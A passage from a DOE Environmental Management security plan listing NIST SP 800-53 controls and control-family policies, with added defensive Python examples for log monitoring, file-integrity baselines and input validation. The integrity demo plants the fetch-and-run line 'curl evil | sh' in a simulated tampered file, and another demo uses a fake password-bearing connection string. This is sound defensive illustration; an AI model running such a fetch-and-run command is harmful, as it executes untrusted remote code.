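        elif int(kv["dport"]) in UNUSUAL_PORTS:
            self._alert("unusual-port", host, t,
                        f"outbound to {kv['dst']}:{kv['dport']}")


def run(lines) -> list:
    """Feed every line through the monitor and return the alerts raised."""
    mon = Monitor()
    for line in lines:
        mon.feed(line)
    return mon.alerts


if __name__ == "__main__":
    for a in run(SAMPLE_EVENTS.splitlines()):
        print(a.time.isoformat(), a.host, a.indicator, a.detail)
```

The sliding window matters: five failures spread over ten minutes are noise, five in eleven seconds are an indicator, and the `recently_bruteforced` state is what turns a routine successful login into the alert an incident responder actually needs.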
SI-4(14) Information System Monitoring X X X X X X No No P1
The organization employs a wireless intrusion detection system to identify rogue wireless devices and to detect attack attempts and potential compromises/breaches to the information system.
SI-4(15) Information System Monitoring X X X X X X No No P1
The organization employs an intrusion detection system to monitor wireless communications traffic as the traffic passes from wireless to wireline networks.
SI-4(16) Information System Monitoring X X X No Yes P1
The organization correlates information from monitoring tools employed throughout the information system to achieve organization-wide situational awareness.
SI-4(17) Information System Monitoring X X X X X X No Yes P1
The organization correlates results from monitoring physical, cyber, and supply chain activities to achieve integrated situational awareness.
SI-5 Security Alerts, Advisories, And Directives X X X X X X No No P1
The organization: a) Receives information system security alerts, advisories, and directives from designated external organizations on an ongoing basis; b) Generates internal security alerts, advisories, and directives as deemed necessary; c) Disseminates security alerts, advisories, and directives to [Assignment: organization-defined list of personnel (identified by name and/or by role)]; and d) Implements security directives in accordance with established time frames, or notifies the issuing organization of the degree of noncompliance.
SI-5(1) Security Alerts, Advisories, And Directives X X X X No No P1
The organization employs automated mechanisms to make security alert and advisory information available throughout the organization as needed.
SI-6 Security Functionality Verification X X X X No Yes P1
The information system verifies the correct operation of security functions [Selection (one or more): [Assignment: organization-defined system transitional states]; upon command by user with appropriate privilege; periodically every [Assignment: organization-defined time-period]] and [Selection (one or more): notifies system administrator; shuts the system down; restarts the system; [Assignment: organization-defined alternative action(s)]] when anomalies are discovered.
SI-6(1) Security Functionality Verification X X X No Yes P1
The information system provides notification of failed automated security tests.
SI-6(3) Security Functionality Verification X X X No Yes P1
The organization reports the result of security function verification to designated organizational officials with information security responsibilities.
SI-7 Software And Information Integrity X X X No No P1
The information system detects unauthorized changes to software and information.
SI-7(1) Software And Information Integrity X X X No No P1
The organization reassesses the integrity of software and information by performing [Assignment: organization-defined frequency] integrity scans of the information system.
SI-7(2) Software And Information Integrity X X No No P1
The organization employs automated tools that provide notification to designated individuals upon discovering discrepancies during integrity verification.
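SI-7, SI-7(1) and SI-7(2) together describe one mechanism: record what the software looked like when it was authorized, re-scan on a schedule, and tell someone when the two disagree. The following added example (illustration only; not an RMAIP procedure or a DOE tool) builds a SHA-256 baseline of a directory tree, runs a scan that reports modified, added and removed files, and calls a notifier on any discrepancy. It also covers the caveat practitioners run into: the baseline is itself a target, so it is authenticated with an HMAC under a key that should live with the integrity service rather than on the monitored host, and a baseline that fails that check is reported as tampering instead of being trusted. Paths, the key handling and the `notify` callback are assumptions for the example.

```python
"""SI-7 / SI-7(1) / SI-7(2): authenticated file-integrity baseline, periodic
re-scan, and notification on discrepancy. Added example; paths, key handling
and the notifier are assumptions for illustration."""
import hashlib
import hmac
import json
import os
import tempfile
from pathlib import Path


def _sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _tag(entries: dict, key: bytes) -> str:
    body = json.dumps(entries, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def build_baseline(root: Path, key: bytes) -> dict:
    """Hash every regular file under root. The record is authenticated so that an
    attacker who alters a file cannot quietly rewrite the baseline to match."""
    entries = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            entries[p.relative_to(root).as_posix()] = _sha256_file(p)
    return {"entries": entries, "tag": _tag(entries, key)}


def verify_baseline(baseline: dict, key: bytes) -> bool:
    return hmac.compare_digest(_tag(baseline["entries"], key), baseline["tag"])


def integrity_scan(root: Path, baseline: dict, key: bytes, notify) -> dict:
    """One SI-7(1) scan. Returns the discrepancy report and calls notify(report)
    (SI-7(2)) when anything differs, including an unauthenticated baseline."""
    if not verify_baseline(baseline, key):
        report = {"baseline_tampered": True, "modified": [], "added": [], "removed": []}
        notify(report)
        return report
    current = build_baseline(root, key)["entries"]
    old = baseline["entries"]
    report = {
        "baseline_tampered": False,
        "modified": sorted(f for f in old if f in current and current[f] != old[f]),
        "added": sorted(f for f in current if f not in old),
        "removed": sorted(f for f in old if f not in current),
    }
    if any(report[k] for k in ("modified", "added", "removed")):
        notify(report)
    return report


def demo() -> tuple:
    """Constructed scenario: baseline a tree, tamper with it, re-scan, then try a
    forged baseline. Returns (clean_report, dirty_report, forged_report, notices)."""
    key = os.urandom(32)   # assumption: held by the integrity service, not the host
    notices = []
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "bin" / "svc").write_bytes(b"#!/bin/sh\necho service\n")
        (root / "etc.conf").write_text("mode=strict\n")
        baseline = build_baseline(root, key)
        clean = integrity_scan(root, baseline, key, notices.append)
        # simulated unauthorized change: binary replaced, config removed, file dropped
        (root / "bin" / "svc").write_bytes(b"#!/bin/sh\ncurl evil | sh\n")
        (root / "etc.conf").unlink()
        (root / "bin" / "dropper").write_bytes(b"x")
        dirty = integrity_scan(root, baseline, key, notices.append)
        # attacker recomputes the hashes (no key needed for that) but must reuse the
        # old tag because the key is not on the host: caught as tampering
        forged = {"entries": build_baseline(root, key)["entries"], "tag": baseline["tag"]}
        forged_result = integrity_scan(root, forged, key, notices.append)
    return clean, dirty, forged_result, len(notices)


if __name__ == "__main__":
    for r in demo()[:3]:
        print(r)
```

In practice the scan frequency is the SI-7(1) assignment, `notify` is wired to the designated individuals named under SI-7(2), and the key and baseline are kept off the monitored system so that a compromise of that system cannot also compromise the evidence.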
SI-8 Spam Protection X X X X X X X X No No P1
The organization: a) Employs spam protection mechanisms at information system entry and exit points and at workstations, servers, or mobile computing devices on the network to detect and take action on unsolicited messages transported by electronic mail, electronic mail attachments, web accesses, or other common means; and b) Updates spam protection mechanisms (including signature definitions) when new releases are available in accordance with organizational configuration management policy and procedures.
SI-8(1) Spam Protection X X X X X X X No No P1
The organization centrally manages spam protection mechanisms.
SI-8(2) Spam Protection X X X X X X No No P1
The information system automatically updates spam protection mechanisms (including signature definitions).
SI-9 Information Input Restrictions X X X X X Yes Yes P2
The organization restricts the capability to input information to the information system to authorized personnel.
SI-10 Information Input Validation X X X X No No P1
The information system checks the validity of information inputs.
SI-11 Error Handling X X X X X No No P2
The information system: a) Identifies potentially security-relevant error conditions; b) Generates error messages that provide information necessary for corrective actions without revealing [Assignment: organization-defined sensitive or potentially harmful information] in error logs and administrative messages that could be exploited by adversaries; and c) Reveals error messages only to authorized personnel.
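SI-10 and SI-11 are usually implemented in the same request path: an allow-list check on the input, and a handler that turns whatever goes wrong into a message a caller can act on without leaking what an adversary could use. The block below is an added example, not code from the RMAIP or any DOE system; it validates a hypothetical "scan target" record (host, port, label), and its error handler writes full detail to an internal log with credential-bearing strings redacted, returns a generic message plus a reference id to ordinary callers, and exposes the redacted detail only to an assumed `admin` role (SI-11 c). The field schema, the role names and the redaction pattern are assumptions.

```python
"""SI-10 input validation and SI-11 error handling on one request path.
Added example; the schema, roles and redaction list are assumptions."""
import ipaddress
import re
import uuid

# RFC-1123 style hostname: labels of 1-63 alphanumerics/hyphens, no leading/trailing hyphen
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
# strings that must never reach a log or a caller: key=value secrets and URLs with embedded credentials
SENSITIVE_RE = re.compile(r"(?i)\b(?:password|pwd|token|secret)=\S+|\b\w+://\S+")

INTERNAL_LOG = []   # stand-in for the protected log sink (constructed for the example)


class ValidationError(ValueError):
    """Input rejected by SI-10 checks; its message is safe to show the caller."""


def validate_target(raw: dict) -> dict:
    """Allow-list validation: reject anything not explicitly permitted rather than
    trying to clean it up."""
    unexpected = set(raw) - {"host", "port", "label"}
    if unexpected:
        raise ValidationError(f"unexpected fields: {sorted(unexpected)}")
    host = str(raw.get("host", ""))
    try:
        ipaddress.ip_address(host)
    except ValueError:
        if not HOSTNAME_RE.match(host):
            raise ValidationError("host must be an IP address or DNS hostname")
    try:
        port = int(raw.get("port", ""))
    except (TypeError, ValueError):
        raise ValidationError("port must be an integer")
    if not 1 <= port <= 65535:
        raise ValidationError("port out of range 1-65535")
    label = str(raw.get("label", ""))
    if len(label) > 64 or not label.isprintable():
        raise ValidationError("label must be printable and at most 64 characters")
    return {"host": host, "port": port, "label": label}


def redact(text: str) -> str:
    return SENSITIVE_RE.sub("[REDACTED]", text)


def handle_request(raw: dict, caller_role: str, backend) -> tuple:
    """Return (status, body). Validation failures are reported in full because the
    caller supplied the bad value; internal failures are logged (redacted) under a
    reference id and only 'admin' callers see the redacted detail."""
    ref = uuid.uuid4().hex[:12]
    try:
        target = validate_target(raw)
        return 200, {"result": backend(target)}
    except ValidationError as e:
        INTERNAL_LOG.append(f"{ref} validation caller={caller_role} msg={e}")
        return 400, {"error": str(e), "ref": ref}
    except Exception as e:                       # SI-11 a: security-relevant failure
        INTERNAL_LOG.append(
            f"{ref} internal caller={caller_role} {type(e).__name__}: {redact(str(e))}")
        body = {"error": "request could not be processed", "ref": ref}
        if caller_role == "admin":               # SI-11 c: detail only to authorized personnel
            body["detail"] = redact(str(e))
        return 500, body


def flaky_backend(target: dict) -> str:
    """Constructed backend whose failure message carries a connection string."""
    raise RuntimeError("connect failed: postgres://svc:Hunter2@db.internal/scans")


if __name__ == "__main__":
    print(handle_request({"host": "10.0.5.23", "port": "22", "label": "dev"}, "user",
                         lambda t: f"scanned {t['host']}:{t['port']}"))
    print(handle_request({"host": "a.example", "port": 22}, "user", flaky_backend))
    print(handle_request({"host": "a.example", "port": 22}, "admin", flaky_backend))
    print(INTERNAL_LOG)
```

The reference id is what makes the generic message usable: the caller reports `ref`, and the person with access to the protected log can find the full (redacted) record without the system ever having echoed the exception to an unprivileged user.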
SI-12 Information Output Handling And Retention X X X X X X X X X Yes Yes P2
The organization handles and retains both information within and output from the information system in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and operational requirements.
SI-13 Predictable Failure Prevention X No Yes P0
The organization: a) Protects the information system from harm by considering mean time to failure for [Assignment: organization-defined list of information system components] in specific environments of operation; and b) Provides substitute information system components, when needed, and a mechanism to exchange active and standby roles of the components.
Appendix C – NIST SP 800-53 Rev 4 Control Family Policies
EM sites may adopt the policies listed in this section or create their own policies to address the control policy requirements in NIST SP 800-53.
AC-1 Access Control
Purpose: The purpose of the AC control family is to ensure that only those who have been granted formal access to an IT system are able to access the system or its information. Access controls also allow the sites to detect, record, and block would-be intruders.
Scope: The access control family must be implemented and monitored on DOE and contractor systems. These security controls provide protection of data through the use of access restrictions to local and remote systems, least privilege functionality, encryption for data in transit and data at rest, separation of duties, restrictions on the use of mobile devices, and session termination.
Roles: The Information System Security Officer (ISSO) and the System Administrators (SAs) are key to the implementation of this control family and are tasked to ensure that proper access controls are implemented based on the NIST categorization level.
Responsibilities: The ISSO is to ensure that the controls are implemented by the SAs, work as expected, and provide adequate protection for DOE EM and contractor systems and data. (Refer to the roles and responsibilities section of the RMAIP.)
These controls are to be tested upon initial system authorization and then once every three years by an independent assessor as part of a continuous monitoring program. The controls should also be tested whenever significant changes are made to access procedures or to the system.
Management Commitment: The site management must ensure that sufficient access controls are in place to protect the system and information based on the categorization level, potential for harm, and acceptable level of residual risk. The site management must provide the resources to implement, and must actively support the implementation of, HSPD-12 compliant logical access by 2012.
Coordination: The ISSO and SAs must coordinate to ensure that the proper level of access controls is in use throughout the site and is tested as part of the initial authorization and continuous monitoring program.
Compliance: The sites must comply with DOE orders, this RMAIP, and NIST Special Publications (SP) 800-46, 800-77, 800-113, 800-114, 800-121, 800-94, 800-97, and 800-124 (as modified).
AT-1 Awareness and Training
Purpose: This family of controls ensures that all personnel (users, administrators, security staff, and those with elevated privileges) are trained in the security policies and procedures relevant to their position. This control also means that no one should have access to a DOE network prior to having attended security awareness training. Similarly, individuals with elevated privileges must have additional training sufficient for them to carry out their security functions.
Scope: Training needs to extend from site management to user personnel within an organization. Training must be done annually to educate all personnel on emerging system and user exploits, risky behaviors (web and phishing), reporting of incidents and suspicious activity, and coordination with other groups that can benefit from lessons learned.
Roles: Training must be accomplished by DOE EM and contractor sites and cover three levels: (1) users, (2) SAs (system, database, and web), and (3) personnel with elevated access privileges. The ISSM is responsible for making sure all personnel are sufficiently trained. If the ISSO determines that training was not accomplished for the current year, the individual will be removed from access to DOE networks.
Responsibilities: The ISSO/ISSM must ensure that all individuals receive security training as required by the site, annually. The ISSO must make sure that all individuals utilizing DOE EM and contractor networks or systems processing EM data receive user awareness training prior to being granted access to the network.
Management Commitment: The site management must provide sufficient direction and emphasis to ensure that all site personnel are trained at least annually. Management must also make certain that records are maintained on training and are kept current.
Coordination: The individual DOE EM sites must coordinate with the EM Cyber Security Program Manager (CSPM) for review and guidance on the depth and scope of their security awareness training. In addition, the EM CSPM must be consulted on elevated privilege training.
Compliance: All sites must meet applicable DOE policy and RMAIP guidance to ensure sufficient and effective training of all personnel at all levels.
AU-1 Audit and Accountability
Purpose: Auditing is one of the critical methods to determine and document how effectively security controls are implemented, whether they are functioning as intended, and whether they are producing the expected results. Frequent audits ensure that security baselines are functioning correctly, are being patched, have authorized CCB upgrades installed, and are sufficient to meet new and emerging security threats and vulnerabilities.
Scope: All DOE EM sites must conduct timely audits of security controls to determine if they meet NIST and DOE security requirements, federal laws, Executive Orders, and/or local regulations or statutes.
Roles: The ISSO/ISSM are responsible for setting up audits, monitoring performance, and providing guidance for corrective actions on audit findings. The ISSO/ISSM must keep the AO/AODR informed on audit findings, the potential impact of the findings, and the options for addressing them.
Responsibilities: The ISSO is the principal individual to formulate, implement, and monitor auditing reports. The ISSO is also the primary individual to establish the plan of action and milestones (POA&Ms) associated with corrective actions.
The ISSO and ISSM must define what is an auditable event, what information is to be recorded, how the events will be monitored and analyzed, where the information on the events will be stored and for how long, and what the process is for responding to and addressing audit failures.
The ISSO must ensure that policies, procedures, and documents are updated annually to reflect audit weakness findings, and that corrective POA&Ms are put in place and followed.
Management Commitment: Site management must address any findings that could alter the level of residual risk accepted by the AO during the authorization process. Management must provide the personnel, resources, and funding to address the POA&Ms produced by audits.
Coordination: The ISSO and ISSM must coordinate with the AO/AODR on findings, potential security impacts, and recommended solutions.
Compliance: The sites' auditing policies and procedures must meet NIST, DOE, and RMAIP security requirements, and/or local regulations or statutes.
CA-1 Security Assessment and Authorization
Purpose: Authorization is the process of evaluating the security policies and procedures that protect an information system and the resulting level of acceptable risk (after safeguards have been applied to vulnerabilities). Authorization is an ongoing process to continually defend against emerging threats, system changes, and insider actions. This control addresses the state of a system at a defined time and configuration.
This set of security controls is used by the AO to determine the acceptable level of residual risk and whether a system should have authority to operate (ATO).
Scope: Authorization is to be performed on all accreditation boundaries (systems or groups of systems) providing services to DOE EM or contractor sites that process, store, or communicate DOE EM data. Authorizations can be performed on a three-year cycle provided continuous monitoring is performed each year to cover all the NIST/DOE security controls/requirements over the three-year period. The AO may elect to re-authorize each individual accreditation boundary after a yearly continuous monitoring assessment provided there is no significant increase in the acceptable level of risk.
Roles: Security authorization is the official management decision, conveyed through the authorization decision document, given by a senior organizational official or executive (i.e., the authorizing official) to authorize operation of an information system and to explicitly accept the risk to organizational operations and assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security controls.
The ISSO/ISSM must provide the resources to prepare for, assist in, and document the initial authorization process, continuous monitoring assessments, and re-authorizations.
Responsibilities: Only the AO can sign/authorize a system for operation. The AODR is responsible for advising the AO on technical matters, providing recommendations, and preparing for assessments. The ISSO/ISSM must provide the resources to prepare, the personnel to assist in assessments, and the documentation of continuous monitoring assessments or re-authorizations.
Management Commitment: The AO must ensure that sufficient resources and management guidance are provided to prepare, conduct, document, and remediate system flaws throughout the system development life cycle (SDLC). The AO must follow the DOE and NIST security requirements to provide protection commensurate with risk. The AO must ensure that all systems have an ATO prior to being connected to the network. The AO must ensure that the Risk Management Framework (RMF) and Risk Management Approach (RMA) are followed and that systems are in compliance with their provisions.
Coordination: The AO, AODR, ISSO, and ISSM must coordinate all authorization processes and continuous monitoring activities with site personnel.
Compliance: The AO must ensure that the RMF and RMA are followed and systems are in compliance with their provisions.
CM-1 Configuration Management
Purpose: This control family is used to maintain the authorized system security configuration at the same level of residual risk as when it was authorized. Configuration management is necessary because of inevitable hardware and software change, approved baseline control modification, and organizational changes that occur throughout all phases of the SDLC.
Scope: This control applies to all DOE EM or DOE EM contractor systems.
Roles: The ISSO, SAs, system owner, and CCB have the primary roles in configuration management.
Responsibilities: The ISSO must create security baseline configurations for workstations, servers, switches, routers, firewalls, databases, IDS/IPS, mobile, wireless, and web systems.
The ISSO or system owner must create, maintain, and monitor an inventory control system for system components.
The site organizations must establish and use a CCB to evaluate, test, and approve all major changes to the secure baseline configurations prior to implementing them on a system. The CCB must establish what is considered a major change to the security baseline and assess the security impact of such changes.
The ISSO/SA must build system components to the latest approved baseline configurations and monitor system compliance with these configurations on a regular basis.
The site must monitor its approved security baseline configurations to detect any changes or improper changes by inside or outside personnel.
The baseline configurations must provide the least functionality needed for site personnel to accomplish their mission.
The site must perform periodic risk assessments to determine if changes or emerging threats have created vulnerabilities.
Management Commitment: The sites’ management must provide the resources for periodic risk assessments, configuration control boards, configuration management software, and a current list of equipment, components, software, and approved configuration changes to the security baselines for such equipment.
Coordination: The ISSO and ISSM must coordinate with the CCB, inventory control, procurement, and legal to ensure that security baseline specifications, federal checklists, approved CCB changes, patches, and system authorization are applied prior to systems being placed online or after significant changes occur within a system.
Compliance: The site must comply with federal baseline checklists, security baseline builds, approved CCB changes, and procurement and legal regulations.
CP-1 Contingency Planning
Purpose: The contingency planning controls are meant to establish policies and procedures so that each site’s systems can accomplish their DOE EM mission within the time periods specified by the business impact analysis (BIA). The organization’s risk management strategy is a key factor in the development of the contingency plan policy/procedures.
Scope: The scope of this plan should address the minor to major incidents that disrupt, slow down, or halt the site’s DOE EM mission/business functions.
Roles: The Contingency Plan Manager and CP team (assessment, activation, recovery, alternate site) members are to be identified by name and position with contact information.
Responsibilities: The CP Manager must make the CP activation decision based on information from the analysis team as to the extent of the damage.
The team members must be trained and must conduct bi-annual contingency exercises that realistically portray possible events.
Management Commitment: The site’s management must provide the resources to staff, train, and conduct CP exercises. Management must, if deemed necessary by a BIA, provide the resources for an alternate operating site that meets the maximum allowable downtimes specified in the BIA.
Coordination: The site must ensure that all of the site’s accreditation boundaries participate in staffing, conducting CP exercises, and CP training.
Compliance: The sites must comply with the provisions of the RMAIP, NIST SP 800-34 (as modified), and any state or local contingency requirements.
IA-1 Identification and Authentication
Purpose: This control is used to authenticate users or processes that are requesting access to local, networked, or remote networks. These controls must be accomplished by two-factor authenticators such as tokens, biometrics, or badge and PIN.
Scope: These security controls are pertinent to DOE EM personnel, contractors, or guests to DOE EM or contractor facilities. The sites must make provisions for HSPD-12 implementation by 2012.
Roles: Site Management, Program Managers, ISSO, ISSM, and SAs must make sure that access by individuals or processes follows approved policies and procedures and is periodically checked for current processing validity.
Responsibilities: The organizations’ Program Management must participate in ensuring that individuals are assigned to the proper functional groups or have access to only those functions that are required for their roles and responsibilities (least privilege). The ISSO and ISSM must be part of the process to assign, review, and approve access levels for individuals or system processes. Guest accounts must follow the same procedures and have limited access and a defined termination date.
Management Commitment: Site Management must ensure that issuance of authenticators and IDs follows the approved process, and that IDs are monitored and revoked upon termination, transfer, or organizational changes. Management is encouraged to perform these tasks by automated means.
Coordination: The Program Managers, ISSO, and SAs must coordinate their efforts to ensure that authenticators are issued properly, are needed, are currently valid, are terminated when no longer required, and provide least functionality.
Compliance: The site needs to comply with NIST FIPS 201 and use the following as guidance: SP 800-63, 800-73, 800-76, 800-78, and 800-100.
IR-1 Incident Response
Purpose: Incident Response controls are utilized to detect, analyze, prioritize, correct, and restore system functionality from unauthorized or nefarious actions by external or internal personnel. These controls provide a process by which suspicious or actual unauthorized actions can be addressed to prevent further damage and infection of additional systems, and provide centralized reporting mechanisms.
Scope: Incident Response can be by system, accreditation boundary, or site and must address DOE and contractor systems. All significant incidents must be shared and coordinated with other operating programs such as DOE JC3 and the US Computer Emergency Readiness Team (US-CERT).
Roles: The organizations’ CIO, program managers, IT/DBMS technical support staff, SAs, ISSO, and ISSM are responsible for developing the incident response capability, monitoring and tracking incidents, and conducting incident exercises and training.
Responsibilities: The appointed Computer Security Incident Response Team(s) (CSIRTs) and the ISSO/ISSM are responsible for creating policies and procedures that will detect, analyze, prioritize, and restore system functions to normal.
Management Commitment: The organizations’ management must provide the resources, personnel, and necessary training and exercises to produce an effective incident response capability that meets DOE JC3 and US-CERT standards. These policies and procedures will enable sites to meet their DOE mission parameters. Management must communicate incident information to other operating groups (DOE JC3 and US-CERT) in a timely and correctly formatted report.
Coordination: The organization must coordinate all confirmed incidents with its other operating groups, such as DOE JC3 and US-CERT, as appropriate.
Compliance: The sites must comply with their defined IR procedures, the RMAIP, US-CERT policies, and local law enforcement policies.
MA-1 Maintenance
Purpose: The purpose of this control is to prevent intentional or unintentional changes resulting from system maintenance or maintenance personnel that could open the secure baselines, grant unauthorized access or changes, or cause damage to the systems. These controls also ensure that the systems are maintained at the current level of security baselines, repairs, patches, and approved CCB changes.
Scope: This control covers all DOE EM site contractor or vendor maintenance personnel. This control family also covers remote maintenance services, whether performed by DOE, site contractor, or vendor personnel.
Roles: The ISSO is primarily responsible for these procedures, in addition to monitoring and documenting them.
Responsibilities: The ISSO must create policies and procedures to perform standard hardware and software maintenance, monitor system changes, perform oversight of site/remote maintenance processes, and document all results. The ISSO must test all significant changes to ensure they have not changed the system’s security posture. Further, the ISSO must ensure that maintenance tools do not alter the system’s security.
Management Commitment: The organizations’ management must provide sufficient resources to ensure that site hardware, software, and other electronic components are identified, catalogued, monitored, maintained, and documented. These efforts will ensure that the latest security baselines, patches, and equipment repairs do not alter or make vulnerable the secure state of the systems or electronic components.
Coordination: The ISSO must coordinate the schedule for equipment repairs, patching, baseline builds, security testing, and monitoring of the security impact of any and all changes. The ISSO must determine if site maintenance or vendor tools may be used on the equipment.
Compliance: The sites must comply with the RMAIP.
MP-1 Media Protection
Purpose: This control is used to secure the handling, processing, data-at-rest storage requirements, and transport of sensitive information on both electronic and hard copy items.
Scope: This control applies to all DOE EM site personnel, on-site contractors, personal computers, telephonic and videoconference services, and site assessors. This control applies to all unclassified, NSS, PII, and appropriate/designated contractor material.
Roles: The ISSO, information owner, and EM CSPM all share responsibility for this control.
Responsibilities: The ISSO must develop a list of sensitive materials, their sensitivity levels, and their system location. The ISSO must put in place access controls, least privilege functions, access monitoring, and alerting of inappropriate or unauthorized access, processing, printing, or copying of such sensitive materials. Encryption techniques must be used on PII and above information. The ISSO must ensure that sensitive information removed from the facility is logged, monitored, and encrypted. The site will institute measures to actively monitor the transfer or copying of sensitive information onto mobile devices of any kind. The ISSO must ensure that media no longer needed for its appropriate use (end-of-life) is securely erased and verified clean, or destroyed.
Management Commitment: The organizations’ management must ensure that security processes for handling and marking for electronic, hard copy, and removable media are in place and enforced. Management must ensure that the necessary mechanisms to inventory, track, mark, and monitor mobile or hardcopy sensitive data, including its destruction, are in place.
DOE EM RMAIP Version 5.1, 251 of 266
Coordination: The ISSO must coordinate with the information owner to determine the sensitivity of information. The site must coordinate with all project groups to ensure the media sensitive material safeguard policies, procedures, and notifications are followed.
Compliance: All media must be appropriately identified, marked, and handled in accordance with DOE policies, this RMAIP, and NIST SP 800-88 (as modified), Guidelines for Media Sanitization.
PE-1 Physical and Environmental
Purpose: This security control is meant to provide the policies and procedures for protective measures employed by physical and environmental safeguards at the site. The controls address access, environmental safeguards for IT equipment, alternative work sites, and delivery/removal of equipment.
Scope: These controls apply to all DOE EM or contractor run sites. All accreditation boundaries within a site must provide these physical and environmental safeguards.
Roles: Human Resources, Security and IT personnel are involved in these controls.
Responsibilities: The organizations’ HR department is responsible for the processes that involve personnel procedures to verify, issue, monitor, and revoke badge access. The organizations’ security personnel will be responsible for access and visitor control including credential verification, recording, monitoring, and escort information. The IT staff must provide secure access to IT rooms, environmental (HVAC and water) monitoring and cabling protection.
Management Commitment: Management will be responsible for coordinating the policies and processes to guarantee that personnel access controls, environmental protections, and IT controls are in place and operating.
Coordination: The ISSO and ISSM must coordinate with HR, IT, and Security staff to make sure that the controls are implemented, correct, and producing the required results in all the physical sites and accreditation boundaries.
Compliance: The site must ensure that they meet all appropriate DOE policy, RMAIP, and local laws and requirements for physical and environmental codes.
PL-1 Planning
Purpose: Security planning addresses the adequacy of security controls to provide risk-based levels of safeguards for the confidentiality, integrity, and availability of the sites’ personnel, mission data, PII and IT equipment. These controls encompass management, operational, and technical safeguards to adequately meet the sites’ acceptable level of risk. This security planning information is captured in the system security plan (SSP).
Scope: Planning applies to all DOE EM sites and contractor sites. In general, any accreditation boundary that collects, generates, processes, stores, or communicates DOE EM data is subject to this control.
Roles: The ISSO, AODR and AO all share responsibility for this control.
Responsibilities: The ISSO is responsible for the creation, implementation, and update of the security controls planning document (SSP). The AO or AODR needs to review and approve the SSP based on acceptable levels of risk, mission requirements, and the NIST Risk Management Framework.
Management Commitment: The sites’ management must ensure that each accreditation boundary has the requisite SSP. Management must also ensure that it meets the intent of NIST’s Risk Management Framework and the Systems Development Life Cycle. Management must enforce policies and procedures required for security planning.
Coordination: The ISSO must coordinate with all site personnel, AODR, and AO in the compilation, execution, update, and documentation of the SSP.
Compliance: The site needs to comply with all applicable DOE Orders, OMB Memorandum 03-22, and NIST SP 800-18 (as modified) requirements.
PS-1 Personnel Security
Purpose: This control family applies to the position categorization, background screening, clearances, termination, transfer and access agreements, and personnel sanctions. This control family is vital to preventing unwanted insider personnel violations. It is also essential for personnel with elevated privileges.
Scope: This control applies to all DOE EM and contractor personnel that have access to DOE EM systems, networks, and data.
Roles: The ISSO, Program Managers and HR all share responsibility for this control.
Responsibilities: The sites’ HR must create a position categorization that includes a position description, tasking, level of access (least privilege), background investigation levels, clearances, termination, and transfer checklists for all personnel. The ISSO must coordinate with the Program Managers and HR to validate all these functions are correct and complete prior to granting access to the network and DOE EM data. Any personnel transfers or terminations must be immediately reported to the ISSO.
Management Commitment: Site management must ensure that position descriptions, level of background investigations (screening), and personnel actions (terminations, transfer, and sanctions) are in compliance with the sites’ personnel security requirements.
Coordination: The sites’ HR, Program Managers, and the ISSO must coordinate to make sure that all these requirements are in place and met prior to granting access to any individual to DOE EM networks or data.
Compliance: The ISSO and ISSM must make sure that all the sites’ personnel procedures are adhered to prior to granting access to DOE EM data or networks.
RA-1 Risk Assessment
Purpose: The purpose of a risk assessment is to ensure that in-place security controls are implemented correctly, operating as intended and producing the correct output to protect the system, data and personnel. The risk assessment family of controls evaluates vulnerabilities, threat sources, and security controls planned or in place to determine the level of residual risk (acceptable risk) posed to organizational operations and assets, individuals, and other organizations based on the operation of the information system. The in-place controls selected must be commensurate with the risk, likelihood, and impact of potential harm.
Scope: Risk assessments (either formal or informal) are to be conducted by all DOE EM sites or contractor-operated sites by using the DOE RMA and NIST RMF, including: information system categorization, security control selection, security control implementation, security control assessment, information system authorization, and security control monitoring.
Roles: The AO, AODR, ISSO, ISSM, system owner, and information steward all share responsibility for this control.
Responsibilities: The ISSO and system owner must create a risk assessment strategy that takes into consideration the magnitude of harm resulting from unauthorized access, use, disclosure, disruption, modification, or destruction of the information system and the information it processes, stores, or transmits. The ISSO must perform periodic risk assessments and scans to determine if components (hardware or software), organizational, environmental changes, or emerging threats have created new vulnerabilities.
The AO/AODR must review and approve the risk assessment strategy, testing methodology, and risk assessment results (acceptable level of risk).
Management Commitment: The organizations’ management must make sure that risk assessments are conducted.
Coordination: The ISSO must coordinate with the system owner and information steward on the sensitivity of data and the level of protection required.
Further, the ISSO must coordinate the risk strategy with all interconnected site boundaries and sub-boundaries.
Compliance: The sites must comply with the provisions of appropriate DOE policy, RMAIP, and NIST 800-30 (as modified).
SA-1 System and Services Acquisition
Purpose: The purpose of this family of controls is to ensure that sufficient resources are allocated for the site to follow the SDLC (initiation through termination) for system components, including: ensuring that security requirements are defined in procurement terms and conditions, that software licenses are not exceeded, that software developers incorporate security practices in developing programs, and that users are not allowed desktop installation privileges.
Scope: This family applies to all DOE procurements for site or contractor purchases.
Roles: This is a collaborative effort between purchasing, contracts, and the ISSO.
Responsibilities: The ISSO and ISSM must ensure that any specific security requirements, enterprise architecture needs, checklist conformance certificates, documentation, and license conditions are incorporated in system component procurements.
Contracts and purchasing must create, document, and maintain the minimum terms and conditions for procurement of system components. These groups must coordinate with the ISSO for review prior to issuing any system components.
Management Commitment: The site manager must ensure that sufficient funding is available to support the system accreditation boundary from initiation to shut down. This includes a line item in the yearly budget for security operations. Site management must ensure that all operating groups follow the same procurement and security rules.
Coordination: The ISSO, contracts, and purchasing groups must coordinate on all system component purchases to make sure they meet the security specifications, terms and conditions, and conformance clauses.
Compliance: The site and individual operating groups must comply with all procurement and legal terms and conditions when procuring system or network components.
SC-1 System and Communication Protection
Purpose: This control family is meant to address system and network policies and procedures. Its intent is to provide “defense in depth” for both systems and networks. This approach provides safeguards within safeguards to make unauthorized access, use or modification of system or network operations more difficult.
Scope: The SC family of controls applies to all DOE EM and contractor systems that contain or have access to DOE EM networks or data.
Roles: The ISSO and SAs share responsibility for this control.
